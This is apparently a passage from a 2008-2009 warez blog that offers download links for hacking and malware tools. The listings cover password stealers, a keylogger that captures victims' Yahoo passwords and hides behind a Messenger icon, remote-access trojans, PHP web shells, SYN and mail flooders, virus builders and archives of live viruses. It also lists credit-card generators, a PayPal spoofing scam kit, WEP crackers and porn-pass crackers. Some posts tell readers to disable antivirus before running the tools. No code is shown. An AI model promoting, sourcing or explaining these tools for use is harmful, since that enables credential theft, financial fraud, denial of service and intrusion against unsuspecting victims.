Showing posts with label hacking sofwares. Show all posts
Showing posts with label hacking sofwares. Show all posts

Thursday, January 15, 2009

Portable Rapid Hacker v4.2-Download rapidsare files without any limit

Portable Rapid Hacker v4.2( Final)

Portable Rapid Hacker v4.2 Final

Its for everyone who dont have RS account (Free User), try it one time you will know, Speed up to 4 time Faster

It's a Program to use within conjunction of sites like, www.rapidshare.com
Rapid Hacker can hack / crack / bypass waiting limit at Rapidshare.com and Rapidshare.de
Just copy-paste the Rapidshare link and get unlimited downloads.
PLEASE DONT FORGET TO SAY THANKS

INSTRUCTIONS:
- paste the rapidshare link
- click ”Go”
- Click the ”FREE” button on the Rapidshare’s page
Just copy/paste rapidshare site and get unlimited downloads.
After you paste the rapidshare link, click ”Go”
Click on the Rapidshare page, press tab 14 times
hit enter if you can’t scroll to the free button

MD5sum: B54C68893B11D57E5A93111B2C2AAF3B[Installer]

After installing, please Run the Patch to fix the Colon bug in Same Folder Where You Install.

MD5sum: F6674A39D5D2E481AE7E8DCC4C220AD1

OS: Windows® 2000/XP/2003/Vista
Languagee: English
Size: 6 Mb

RS Download

Monday, December 1, 2008

Wireless Hacking Live - FBI version ISO 11-08-2008, 08:06 PM



Live Cd For Wireless Hacking, Also Used By The FBI

This version is for all systems except systems with the Intel B/G wireless cards (IPW2200).
- Live CD with all the tools you need to hack a WLAN / wireless Access point - Linux Live-CD - OS runs from CD - 635 mb - .iso
- also used by the FBI.

WEP Hacking - The Next Generation
WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.

Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of �strong� encryption while a 128 bit key has 104. The IV is placed in encrypted frame�s header, and is transmitted in plain text.

Traditionally, crac*ing WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packetsa��a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP crac*ing program such as Aircrac* would be used to find the WEP key.

Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, �It doesn�t matter if you use 128 bit WEP keys, you are vulnerable!�

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products.
WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.

Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long.
A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of �strong� encryption while a 128 bit key has 104.
The IV is placed in encrypted frame�s header, and is transmitted in plain text.
Traditionally, cracking WEP keys has been a slow and boring process.
An attacker would have to capture hundreds of thousands or millions of packets a process that could take hours or even days, depending on the volume of traffic passing over the wireless network.
After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.
Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared.
This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours.

Basic Directions:
1)Boot from cd
2)get the wep key
3)write it down
4)reboot into windows
5)connect using wep key.

Note: if you have problems burning the ISO, convert the ISO using Magic ISO to nrg image, before burning.

Size : 626 MB(6X100+26)




Code:
Download Wireless Hacking Live-CD.part1.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part2.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part3.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part4.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part5.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part6.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part7.rar, upload your files and earn money.


OR


Code:
http://letitbit.net/download/1153f44...part1.rar.html

http://letitbit.net/download/b249be9...part2.rar.html

letitbit net - this is totally free file hosting. The speed and size of files is no limited.

letitbit net - this is totally free file hosting. The speed and size of files is no limited.

http://letitbit.net/download/6e7b358...part5.rar.html

http://letitbit.net/download/a1d4bd4...part6.rar.html

http://letitbit.net/download/6f054e3...part7.rar.html

Proxec Proxy Clicker - Get fake traffic to your page!



http://images34.fotosik.pl/235/8e4b531b28ec6212.gif

Hackers Black Cd

28:41 Series Intro
29:16 Hacker Terms
35:54 Hacker Procedures
26:42 Using VMWare
49:17 Using Linux
27:44 Passive Intelligence Gathering Part 1
31:43 Passive Intelligence Gathering Part 2
33:24 Social Engineering
33:33 Network Reconnaissance Part 1
30:25 Network Reconnaissance Part 2
33:03 Service Identification and Enumeration
35:35 Vulnerability Assessment: Nessus & GFI Languard
26:35 Vulnerability Assessment: Network Sniffing
34:55 SNMP
33:01 DNS
44:13 Password Cracking
36:58 Exploits Part 1: Linux
34:09 Exploits Part 2: Windows
24:36 Web and File Exploits
37:56 Wireless Security
20:33 Erasing Tracks
arp spoofing
Null session

http://rapidshare.com/files/102108980/Hack...k_CD.part01.rar
http://rapidshare.com/files/102112293/Hack...k_CD.part02.rar
http://rapidshare.com/files/102115645/Hack...k_CD.part03.rar
http://rapidshare.com/files/102395271/Hack...k_CD.part04.rar
http://rapidshare.com/files/102398225/Hack...k_CD.part05.rar
http://rapidshare.com/files/103178815/Hack...k_CD.part06.rar
http://rapidshare.com/files/102391957/Hack...k_CD.part07.rar
http://rapidshare.com/files/102107461/Hack...k_CD.part08.rar

All Messenger Password-stealer & Much More

Coder: c4!N
Compiler: Delphi
testet : Windows XP SP2
Source-Protector: Themida
Description: The UnLimited PW Stealer is a high-quality PW Stealer with the following characteristics:

hack the following accounts:

PW Messanger Packet

MSN Messenger
Windows Messenger
Yahoo Messenger Google Talk
ICQ Lite
AOL Instand Messenger/Netscape 7
Trilian
Miranda
GAIM

PW Mail Packet

Outlook Express
Microsoft Outlook 2000/XP/2003
IncrediMail
Mozilla Thunderbird
Netscape
Group Mail Free, Gmail
Yahoo Mail
Hotmail / MSN Mail
Eudora

Protected Storage PW Packet

Outlook Passwords
Auto Completet password in IE
Password protected sites in IE
MSN Explorer Passwords

Steam PW Packet

Steam Username
Steam Password
Steam game-path

Game Key Stealer

UT 2003/2004
Battlefield 1942 / Road to Rome / Scret Weapons / Vietnam
Need for Speed Hot Pursuit 2
James Bond 007 Nightfire
Command & Conquer Generals / Zero Hour
SimCity 4
Call of Duty 2 / United Offensive / 1
SWAT 4 / EXP

Windows Info Packet

Windows Username, Windows Computername ect. ect.

Other options are:

FTP Upload Information
Crypt the ploadfile PW Files
Crypt the FTP Settings
Melt Server (Self-Delete after Execute)
File Attribut on hidden set
Icon Changer
UPX Packer
and many more Smiley
UnLimited_PW_-_Stealer_0.40.rar
Description:

Download
Filename: UnLimited_PW_-_Stealer_0.40.zip

Your security stuff may detect it as a security risk.
http://images34.fotosik.pl/235/8e4b531b28ec6212.gif

Active@ Password Changer Professional 3.5(Build 0277) + Key



Active@ Password Changer is designed for resetting local administrator and user passwords on Windows XP / VISTA / 2008 / 2003 / 2000 systems in case an Administrator's password is forgotten or lost. You do not need to re-install and re-configure the operating system.

Forgotten password recovery software has a simple user interface, supports multiple hard disk drives, detects several SAM databases (if multiple OS were installed on one volume) and provides the opportunity to pick the right SAM before starting the password recovery process. It displays a list of all local users. The software user simply chooses the local user from the list to reset the password.

Other Windows login security restrictions like 'Account is disabled', 'Password never expires', 'Account is locked out', 'User Must Change Password at Next Logon' and 'Logon Hours' can be changed or reset.


http://images34.fotosik.pl/235/8e4b531b28ec6212.gif

PW = OwlsNest

Porn Tools AIO (Get Free Porn Passes, Accounts + More)

Hack porn passwords easily, get free porn accounts from any porn site you want, you can do so much stuff with this, many applications in one download.

-PassGuide v3 (For Getting Porn Passes)
-Nici Porn App.
-Porno Searcher
-Porn Bot
-Porno Links XP
-Porn Movie Grabber
-Many Free Porn Listing's
-Porn Pass Dump Listing's
-Porn Site Cracking Tutorials Specifically Written On How To Crack Porn (Also Includes Download Links To The Best Crackers)
-Vision Porn Password Checker
..And Much More!
http://images34.fotosik.pl/235/8e4b531b28ec6212.gif

Powerful Syn Flooder!



Powerful Syn Flooder!

SynFlooder is a powerful flooder, it can sometimes take down even the strong servers.

http://images34.fotosik.pl/235/8e4b531b28ec6212.gif

MSN AIO Hack

Image

An AIO hack application.Includes yahoo also.Uses brute forcing and keylogging, and backdoors.Includes source codes for avid learners of VB6.The app is detected as a backdoor and trojan so deactivate your anti virus before using it

http://images34.fotosik.pl/235/8e4b531b28ec6212.gif

PASSWORD:www.w4rez.org

--== Dangerous Viruses XXX Not For Noob XXX ==--

Download at ur Own Risk

W32.Bagle.AF
W32.Bagle.H
W32.Hiton.A
W32.MyDoom.F
W32.Netsky.Z
W32.Netsky.D
W32.Netsky.B
W32.Sober.F
W32.Sober.D
W32.Sober.C
W32.Sober
W32.Dumaru
W32.Sobig.F
W32.BugBear.B
W32.LovSan/Blaster1
W32.Sinapps
W32.Sunday
W32.Delta
W32.Gold
W32.Retro
W32.Koshi.1.9
Linux.ADM
Linux.Coco
W32.NBC
W32.Clickit
W32.Parasit
W32.PolySnakebyte
W32.RousSarcoma
W32.Hllw.Sydney@MM
CIH
I Love You
Melissa
w32nimda
Wagner 782
Casino
Harddrive-killer pro 5
Code red 1
Code red 2
Pokemon Pikachu
AIDS
hdfill
Blackday
Bulbasaur
Mirc.El_Che_is_alive
Kpmv.W2000.Poly
Mbop!
C-worm
Batschell
bat.antifa
Bat/BatXP.Iaafe
Bat\\bun
Bat.Bush
BAT.Dolomite.worm
bat.****
bat/hotcakes
bat.ina
bat.junkboat
bat.soulcontrol
BatXP.Saturn
BAT/Calvin&Hobbes
claytron
HoloCaust
p2p.Opax
PERL.Nirvana
VBS/Artillery
vbs.eva
VBS/Evade
Vbs.Evion
w32.merkur.c
W32/Outsider
W32/Outsider B
W32/Outsider C
W32/Outsider D
W32/Outsider E
W32/Perrun
W97/Blackout
W97M/Authority
W97M/Chester
W97M/SFC
WinREG.Sptohell
Virenpaket 0
Virenpaket 1
Virenpaket 2
Virenpaket 3
Virenpaket 4
Virenpaket 5
Virenpaket 6
Virenpaket 7
Virenpaket 8
Virenpaket 9
Virenpaket 10
Virenpaket 11
Zed\'s Word Macro Virus Constructor
Windows Scripting Host Worm Constructor 1.0
Special Format Generator 2.0

http://images34.fotosik.pl/235/8e4b531b28ec6212.gif

Ghost Keylogger

Image

Would you like to know what people are doing on your computer? Would you feel better to know what your children are doing on the internet? Ghost Keylogger can help you!

Ghost Keylogger is an invisible easy-to-use surveillance tool that records every keystroke to an encrypted log file. The log file can be sent secretly with email to a specified receiver.

Ghost Keylogger also monitors the Internet activity by logging the addresses of visited homepages. It monitors time and title of the active application; even text in edit boxes and message boxes is captured.

Some applications of the keylogger
- Monitor your computer while you are away
- Retrieve lost information
- Parents can monitor their children activity
- Monitor what and when programs are opened
- Find out what you actually wrote

Some features
- Windows 95 / 98 / ME / NT / 2000 / XP compatible
- Invisible (even in the NT / 2000 / XP process list!)
- Send the log file secretly with e-mail
- Customizable key filter
- Encryption of the log file
- Logs the current user and computer name
- Captures passwords and all other hidden text (****)
- Logs the URL's of the visited homepages
- Keeps track of all programs and times
- Monitors multi-user machines
- Optional hotkeys to bring up the application

- Very configurable
- Easy to deploy


http://images34.fotosik.pl/235/8e4b531b28ec6212.gif 
pass:www.w4rez.com

Monday, August 11, 2008

Lord_Password_Sender

t
img138/5569/18513517kb9.png
download link

http://www.2shared.com/file/3260203/...Sender_20.html


dont forget sey thnx if u like my pos

Hackers Tool Set MUST HAVE

Hackers Tool Set IMC Grahams Trojan
IMC Ice Dragon
Myspace Password Cracker
IMC Myspace Phisher
Ultra Surf
Rapid Share Account Gen
MSN Nudge Madness
Ice Reloaded MSN Freezer
IMC Handbook
BrutusAE2
Lord PS
Hoax Toolbox
IMC Word List
Blues Port Scanner
Bandook RAT v1.35
Project Satan 2.0
EES binder v1.0
File Injector v3
Remote Desktop Spy v4.0
Passive Terror v1.3 Final Edition
Dyn-DL (Dynamic downloader)
Silent Assassin v2.0
Net Scan Tools v4.2
Rocket v1.0
NStealth HTTP Security Scanner v5.8
Attack Toolkit v4.1 & source code included
Legion NetBios Scanner v2.1
Battle Pong
TeraBIT Virus Maker v2.8
p0kes WormGen 2.0
JPS Virus Maker
IRC Ban Protection
IRC Mega Flooder
FTP Brute Hacker
RAR Password Cracker
Vbulletin 3.6.5 Sql Injection Exploit
IPB 2-2.1.5 Sql Injection Exploit
IPB 2-2.1.7 Exploit
Cain & Abel v4.9.3
NetStumbler 0.4.0
Cryptor 1.2
VNC Crack
Mutilate File Wiper 2.92
Hamachi 0.9.9.9
pbnj-1.0

DOWNLOAD

H4cking WorldHack Suite

H4ckingWorldHackSuite !!! $$$ !!!

Cmaster
CC Verify
CWizard
THCC
Visa Card Generator 06
Carcabot_Mass_Email
CcHack
CC-Fake
cvv2c
DesertCVV2
id-fake
Paypal-Link-Spoofed-Scam
HoW To Get Credit Cards Fresh And Fastest

------------------

AIO

uploader for all
Cool Small Usefull Dp

------------------

ANONIMITY

Jap

------------------

BINDER&PACKER

ees binder v1.0
NT Packer v2.1
NakedBind v1.0
Aspack 2.1
F.B.I. Binder
AFX Executable Binder PRO
Deception v4.0
coolbind22
Binder v2.1
Deamon Crypt v 2.0
AmkoJoiner
MultiBinder v1.4.1
MicroJoiner v1.7
Pretator v1.6
YAB Binder v 2.0

------------------

BRUTER

WebCrackv4.0
BrutuS
Crack FTP
FTP Brute Hacker
phpbb bruteforcer
PhpBB pass extractor
phpBB Cracker
Email Cracker
FTP Brute Forcer

-------------------

EXPLOIT COLLECTION

10377 Exploit
SMF ShoutBox Xss & Html Inj
SMF Ultimate Shoutbox Cookie Disclosure Exploit
Firefox_BuG
ATTENTION!!!
Some of this exploit might not open because some protective error
-------------------

FLOOD_DOS

Flowbabeflow
FreeSiteKillerV2.01
webxgrab
Web Attacker ENG
TheRapist - DoS Attacker
HybridFlood2
Anti-russ 3.0
Http Bomber v1.001b
Sprut
DoS_5
etherflood
DoSAttacker
phpBB Dos
phpBB Attacker
Ping Attack
Site Nuke
Divine Intervention
UC Forum Spammer
Inferno Nuker
Multiple Site FlooD

------------------

GOOGLE HACKING

Alt-GooGle
Google Version 1.2
Google H4ck3r
GooLink

------------------

KEYLOGGERS

Elgolf 1.0 Beta
ESK KeyLogger
Glog Keylogger
HermanAgent
IKlogger0.1

------------------

MESSENGER

MSN Extreme 3.0
winks,moods,muggins,weemees and meegos + Installer
MSN Messenger Account Cracker v2.0
Hotmail Email Hacker
Hotmail HAcker Gold
HotmailHack
yahooUltraCracker
MSN Spy Lite v1.0
Yahoo Hack !
SH Yahoo Pass Sender 1.1
Yahoo Password Decoder

------------------

OTHER BACKDOOR

all in one shell backdoor
assh0le backdoor
blowdoor30c
intestinal worm backdoor
NST Back Connect Backdoor
All RooT
backd00r
genie v151
m0trix
Private Backdoor

------------------

PASSWORD CRACKERS

rainbowcrack-1.2-win
md5_cracker
Jhon 1.7 Win
mdcrack-1.2
hydra-4.6

------------------

PHP SHELL'S

c99shell
r57shell
BackDooR (fr)
Defacing Tool Pro v2.5
nstviewshell
PHP Backdoor v1
PHP_BackDoor_v1.5
PHP_Shell_v1.7
Simple_PHP_BackDooR

------------------

RAPID SHARE & CO HACKING

Link Grabber 3.0.4
Rapidshare Hack
RapidGet
RapidSearch.Beta.0.1
RapidLeecherv4.4.87
MaC Rapid
Premium Account Checker
RapidMule
RapidShare AntiLeech
RapidShare Checker
RapidShare Decoder
Renew IP
RapidUp
The Grabber 1.4.1
Unlimited RapidShare With I.E.

------------------

SCANNER

SuperScan 4
Stealth - HTTP Scanner v1.0 build 23
CGI Vulnerability Scan
CGI Scanner v4.0
Legion NetBios Scanner
CGI Founder v1.043
Scanarator
SuperScan 3.0
Blues Port Scanner
NetBIOS Name Scanner
MooreR Port Scanner
Trojan Scanner 1.0 Modded By RooT
nmap 4.03

------------------

SECURITY

Kism 0.2

------------------

SQL Injection

sqlbftools
sqldict
forcesql
sqlinjector
sqlping
SQL INJECT Commander
SQLPowerInjector

------------------

TROJAN & RAT

SKD Rat 2.0
Combined Forced Rat Beta
Gadu-Ghost Trojan v.2.3
ProRat SE 1.8
Cyn v2.1
MofoTro 1.1
Furax 1.0b
Omerta 1.3
Remote Dark Trojan
X Rat v3.3
TGA Backdoor v2.0

------------------

TUTORIAL &TEXT

Defacing
Hacking_GMail
Hackers Black BooKs

------------------

WIRELESS

AirCrack
Kismet


DOWNLOAD

Sunday, August 10, 2008

Hackers Manifesto 550 in 1

Hackers Manifesto 550 in 1
Audio theme:
Halman party - Greek Lover
This AIO has:

Flooders:
BattlePong Pro
Beer
Bmb2
Boom
DOS Panther Modern Mode 1
DOS Panther Modern Mode 2
Final Fortune 2.4
Gewse97
Hak Tek Version 1.1
Internet Packet Tools v1.00 Build 300
IPing 32
Kaput 1.0 beta 1.5
Mutilate
Octopus
Ping
Port**** 1.0b2
Pounder Alpha 1
Shockwave
Sonar v1.0.2
Technophoria Battle Pong
X-Script ICMP Bomber v0.3

Gr33k-L0v3r says:
CainAbel NT2KXP Password Cracker
Fake Webcam 1.0
Mail Freezers
MessenPass 1.04
Msn Webcam Recorder
Opera 9.0 Build 8031
Resource Hacker
Serials 2000


IRC:
Mass IP Logger


Keyloggers:
DOS Keylogger
Easy Macro v2.01
Invisible Key Logger 97
Keycopy v1.01
Keylog Windows v1.5
Powered keylogger v1.3.5.56


Mail Bomb:
Anonymous Mail Bomber.zip
Divine Intervention.zip
Euthanasia v1.52.zip
fmbomb.zip
Homicide.zip
KaBoom v3.0.zip
Mail Bomber v8.1.zip
Mail Fraud.zip
mailbombv02b.zip
MiSoSKiaN's Fake Mail.zip
Nemisis Mail Bomber v1.0.zip
Poperganda v2.0.zip
Quick Fyre.zip
Saddamme v0.2.zip
SMS Bomber v1.3.zip
Unabomber.zip


Mailbombers:
Aenima 1.5
Anony Mail
Euthanasia version 1.52
Flamenews
Quick Fire
Scythe
Sneaky
UnaBomber


Needed Files:
Comdlg32.ocx.zip
Vbrun300.dll.zip
Winsock.dll.zip


Ping & Nukes:
Battle Pong v1.0
(->_<-)(->_<-)(->_<-)(->_<-)(->_<-)Slap v1.0
Click v1.4
F-ed Up v2.0
Gimp
IgmpNuke v1.0
kod
LORNuke v2.0
Meliksah Nuke v2.5
Muerte v2.1
Nuke em v1.0
Nuke v2.3


Port Scanners:
Cha0scanner v2.0
CoreScan
FTP-Scan
HackCityOPS
PortPro v0.93
Warp Scanner 2.0


Remote Administration Tool:
Clients:
back orifice source.zip
BackDoor v2.0.zip
DeepThroat v3.1.zip
Doraah War Engine v1.0b.zip
Hack 'a' Tack v1.20.zip
Http Bomber v1.001b.zip
Kuang2 Client v0.21.zip
NetBus v1.20.zip
NetBus v1.70.zip
NetBus v2.0b Pro.zip
SchoolBus v1.85.zip
Shadow Remote Administator & Control v1.04.zip
Shadow Security Scanner v5.07.ZIP
Shadow Security Scanner v5.21.ZIP
SubSeven v2.1 Gold Edition.zip
Vampire v1.2.zip
WebCracker v4.0.zip
WinCrash v2.0.zip
wwwhack v1.913.zip


Servers:
BadBoy Killer.zip
k2psf_src.zip
kuang the virus.zip
netbus153src.zip
PSource.zip


Technical Help:
Access SQL.pdf
AMD Athlon and Duron Processor - Based System Build Checklist.pdf
AMD Athlon Processor System Cooling Guidelines.pdf
AMD Builders Guide for Desktop - Tower Systems.pdf
AMD Processor.pdf
AMD Thermal - Mechanical & Chassis Cooling Design Guide.pdf
AMD Thermal - Mechanical and Chassis Cooling Design Guide.pdf
BIOS Error Messages.htm
BIOS POST Codes.htm
Bluetooth.pdf
Choose Your Words.pdf
Communicat - Intel.pdf
Connection Speed.pdf
Controlling Internet Explorer.pdf
Create Your Own CDs.pdf
Custom Interface.pdf
Customising Netscape 6.pdf
D845WN Changes.pdf
D845WN.pdf
Data Mining.pdf
Desktop Look.pdf
Digital Audio - Intel.pdf
Digital Certificates.pdf
Dual Booting.pdf
Email Forever.pdf
FAQ - AMD Athlon MP - AMD Athlon XP.pdf
FAQ AMD Athlon Processor - Based Computer.pdf
FAQ.htm
Favorites.pdf
Find The Orphan.pdf
Fixing Outlook Files.pdf
Gaming - Intel.pdf
GCE8520B.pdf
Hard Drive Upgrade.pdf
How to Check AMD CPU.pdf
How to Make Skin For Windows.pdf
Intel Celeron Processor.pdf
Intel Pentium 4 Processor.pdf
Internet Explorer Channels.pdf
Internet Printing.pdf
Internet Privacy.pdf
Internet Spyware.pdf
JPEG 2000.pdf
Keyboard Shortcuts.pdf
Know Your BIOs.pdf
Know Your Cable.pdf
Manage Your Passwords.pdf
Modifying Directory Defaults.pdf
Mouse Keys.pdf
MPEG-4.pdf
Net Connections.pdf
Network Your Home.pdf
Online Databases.pdf
Overclocking Your CPU.pdf
P2P Technology.pdf
PCs of The Future.pdf
PDA Data Exchange.pdf
PDA Printing.pdf
Printed Labels.pdf
Remote Control Your PC.pdf
Rescue Your System.pdf
RFB Protocol v3.3 Header.pdf
RFB Protocol.pdf
Safe Surfing.pdf
Search Windows 2000.pdf
Secure Your PDA.pdf
Setup Voice Mail & Fax.pdf
Setup Your Web Cam.pdf
Share Your PC.pdf
Socket A AMD Processor and Heatsink Installation Guide.pdf
Tools For Your Business.pdf
Types of Virus.pdf
Ultimate Memory Guide.pdf
Understanding Processor Performance.pdf
VB Code.htm
Viruses That Aren't.pdf
Visualise Your Site.pdf
Web Animation.pdf
Web Presentations.pdf
Which Registrar.pdf
Windows 2000 Born to Serve.pdf
Windows 2000 Internet Service.pdf
Windows 2000.pdf
Word 2000.pdf
XML Power.pdf

AOpen:
AK73.pdf
AK73av.pdf
AK75.pdf
AK75p.pdf
AK77333.pdf
AK77333FN.pdf
AK77400MAX.pdf
AK778XM.pdf
AK778XN.pdf
AK77p.pdf
AK77pa133.pdf
AK77U2333.pdf
ATA100 IDE Raid.pdf
EzRestore.pdf
MK332a.pdf
Mk73le.pdf
Mk73len.pdf
MK77.pdf
MK77333.pdf
MK77MII.pdf


Viruses:
!-.zip
44.zip
4mat2.zip
8fish.zip
90210.zip
Acidtrip.zip
Aduh b.zip
Aduh.zip
AmazonQueen10.zip
AmazonQueen11.zip
AmazonQueen20.zip
Ambulance B.zip
android.zip
Androide.zip
andropin.zip
andy.zip
Angel of Death.zip
anna.zip
another.zip
antenter.zip
anti-win.zip
anticaro.zip
antieta.zip
antipode.zip
Anti_daf.zip
apocalyp.zip
Apparition.700.zip
aprilone.zip
apss1120.zip
Apss1135.zip
arbeit.zip
archer.zip
ArhiWorm.300.zip
Ari 1962.zip
Arihworm 2.1.zip
A(->_<-)(->_<-)(->_<-)0_99.zip
Astronauta.zip
atomic10.zip
auntb.zip
avp-aids.zip
Babasoni.zip
babybug.zip
bacteri1.zip
bacteri2.zip
Bacteria 1.zip
Bacteria 2.zip
badattit.zip
bad_reli.zip
barney.zip
barrotes.zip
Baster.zip
Bat-126.zip
Bat-282.zip
Bat-506.zip
Bat-527.zip
Batalia1.zip
Batalia2.zip
Batalia3.zip
Batalia3b.zip
Batalia4.zip
Batalia5.zip
Batalia6.zip
Batman 186.zip
Batvir.zip
beavis.zip
BeavisVD.zip
Bengal Tiger.zip
berwyn.zip
Bfv_B 475.zip
Bingo.zip
bin_acid.zip
bin_obs.zip
bios_men.zip
Bit Addic2_0.zip
Bitlezz.zip
bizatch.zip
Blah-3379.zip
Bmbb.zip
Borg.zip
brother.zip
bubbles1.zip
bubbles2.zip
Bug 560.zip
Bugs.zip
Burglar.zip
Bv Root.zip
Bv Vx 558.zip
Bv_Lame 874.zip
Cerebrus.zip
Cheezy 329.zip
Cih 14.zip
cih.Zip
ClsV.zip
Code-169.zip
Code-356.zip
Cold.a .zip
Combat.735.zip
Combat.736.zip
Combat.737.zip
conjalad.zip
Craz C 1414.zip
Craz E.1267.zip
cyber101.zip
daddy.zip
Dark Akuma.zip
Darky.a .zip
Debug virus.zip
Ditty.zip
drazil.zip
Drop2645.zip
Duke.102.zip
elvira.zip
Enmity v1.0.zip
First Path.zip
For-322.zip
Fret102.zip
Froggy 1476.zip
Galindo.zip
GeeWiz 145.zip
GeeWiz 216.zip
Goofy.zip
GPB.zip
Gremlin 1424.zip
Grunch 1189.zip
Guru.zip
Gwar-Messev.zip
Hellow.zip
Heretic.zip
Hex virus.zip
Highjaq.zip
Hillary.zip
HLLC.Friend.4752.zip
HLLC.Path.4464.zip
hllspwn2.zip
hma-boot.zip
HNY.3350.zip
Hot to Trot 3.zip
HTML.Tramp.zip
I hater-u-all.zip
Ich.zip
Illusion.zip
imi10b.zip
incubus.zip
Infect 406.zip
inferdem.zip
Ins.zip
insert.zip
insert2.zip
inv-evil.zip
Invircible Killer.zip
ioverlay.zip
itti_a.zip
itti_b.zip
jasmine.zip
Jezebel.zip
julio13.zip
k-cmos.zip
kellie.zip
Kellie_B.zip
keykap_2.zip
Killer-.zip
killer.zip
Kit.zip
Klez.zip
kmfdm.zip
kode4v10.zip
kode4v20.zip
kohn-6.zip
kohn-9.zip
kompanio.zip
Koshi 1.9.zip
krad.zip
Krile1.zip
LIFE_STAGES.TXT.zip
liveviruses.zip
lizard.zip
Lorez [Virogen].zip
LOVE-LETTER-FOR-YOU.TXT.zip
LOVE-LETTER-FOR-YOU_TXT.zip
magistr.zip
Manowar.zip
MarkJ.zip
Mdma.zip
melissa.zip
Melt 2A.zip
Melt 3C 1811.zip
Melt 3F.zip
Metallica.A .zip
MF.227.zip
MF.251.zip
MF.282.zip
MircBat 1.1.zip
Mobius.zip
Moral 941.zip
mummy.zip
natas.zip
neuropth.zip
New Host.zip
Nice 2897.zip
No Pasaran.zip
Npox-v11.zip
Nuc.a .zip
Nuc.b .zip
nukeviruses.zip
Nulspace.zip
nympho10.zip
odiumrel.zip
Offspr82.zip
ontario3.zip
opwolf.zip
opy.zip
Orag.zip
Orgasmatron.zip
otis.zip
ow-42.zip
Owrb.zip
Owrb2.zip
p.zip
Parasite.zip
Passion 1354.zip
Paykiller 21.zip
Penfold.zip
PG94.zip
PifV.zip
Polybat.zip
Pot-B.zip
Pot.zip
qmagick.zip
quake-o.zip
qý.zip
Ramble.zip
revengeviruses.zip
sabbath.zip
satanbug.zip
SBVM 0.02d.zip
scramble.zip
scroll.zip
seneca.zip
senecab.zip
(->_<-)(->_<-)(->_<-)y.zip
sft.zip
Shadow.zip
Shak 1268.zip
Shimmer 1.zip
Shimmer 2.zip
shimmer1.zip
shinyhap.zip
shithole.zip
sillamb1.zip
sillamb2.zip
Simplex-CE.zip
sircam.zip
sister.zip
Skul.zip
Skywalke.zip
Sly_I boot.zip
Small.a .zip
small.zip
smallvir.zip
smurf.zip
sobj3_0.zip
Sofa.zip
Sofia_v1.zip
sofia_v2.zip
soldier.zip
Soliton.zip
soupy.zip
Spawn.zip
SpiceGirl 1619.zip
SpiceGirl2123.zip
ster1.zip
ster2.zip
Stioxyl.zip
Stupid.zip
sturm.zip
Suburbs.zip
suicide.zip
sundevl1.zip
Super.544.zip
Svs-B.zip
swedwarr.zip
Symbolic.a.zip
Sys 602.zip
sysinf.zip
SysV.zip
Tally.b .zip
Text File Virus.zip
The Mole.zip
Tiny.zip
Tnse-Batch.zip
Trinity.zip
unameit.zip
v100.zip
v786v201.zip
v80hex.zip
v8_ball.zip
Vbs Worms Generator 2 Beta.zip
VBS.Freelink.zip
Vir!.zip
Viru 412.zip
virus.zip
ViZ.zip
Voff 1363.zip
Wagner.zip
warez.zip
Weird Al.zip
Wise2233.zip
wpart_c.zip
Xop Winstroy.zip
Xop.zip
yougotit.zip
Zeke.zip
ZekeCall.zip
Zep.zip
zero-2-0.zip
Zipbat 607.zip
Zop-b.zip
Zor.zip


Z@4r1x:
CrackersKit 2005
Cracks
Golden eye 2005
HostScan v1.6.5.531
Invisible Browsing v4.0
IPScanner v1.86
Net Tools Suite Pack Abril
NFO-Tools All In One
Patchs All In One 2005
SoftIce 4.05 -Win 2000-XP

http://rapidshare.com/files/56791534/Gr33k-10v3r.part1.rar
http://rapidshare.com/files/56799286/Gr33k-10v3r.part2.rar

Default Digital Keylogger v3.0

http://img152.imageshack.us/img152/5896/screenshotmi7.jpg

I was browsing around for some keyloggers and i found a very good tool. Here is some info on this tool:





Client size : 912 KB

Server size : 196 KB



New : Server captures all windows .



Server :



Copy file : C:\WINDOWS\system32\explorer.exe

Starup : Yes , SystemDriver

Disable Task Manager : No

Hidden Install : Yes

Icon : Yahoo! Messenger



No "Missing file error" for client and server .



Features :



- Get keylog Automat : You set how fast to recive the keylog from server .

- Get keylog Manual : Click "Get Keylog" to get the keylog from server .

- Close Y! : You will close victim's Yahoo! Messenger , the victim will
login , and you will get his password . Server will disable "Remember
ID & Password" and "Auto-Login" options if they are activated .

- Kill Server : The server will be deleted from victim's pc .

- Send Message : You can send a message to your victim . Message type will be critical , the title will be "Mcft Windows" .

- Use Backspace : If you select Yes , if your victim press Backspace
button , it will have an effect to your keylog . It will delete a char
from keylog . If you select No , pressing Backsapce button , won't have
any effect .

- Save Log : You can save the keylog to your PC .

- System Tray : The client will move to System Tray , behind the clock . Just move mouse over his icon to restore it .



Download

CRACKERS MATRIX, in-depth guide to the computer cracking underworld

RELEASE DATE...: January 12th, 2007

Crackers Matrix is your in-depth guide to the computer cracking

underworld. Discover the secret tools and techinques real

crackers use to undermine software and computer systems. Our

researchers have cracked the cryptic code, simplifying their

discoveries into step-by-step tutorials. Our comprehensive

library will equip you with the many tools and methods elusive

crackers use to break passwords and overcome software

restrictions. Learn how to crack passwords, zip files, register

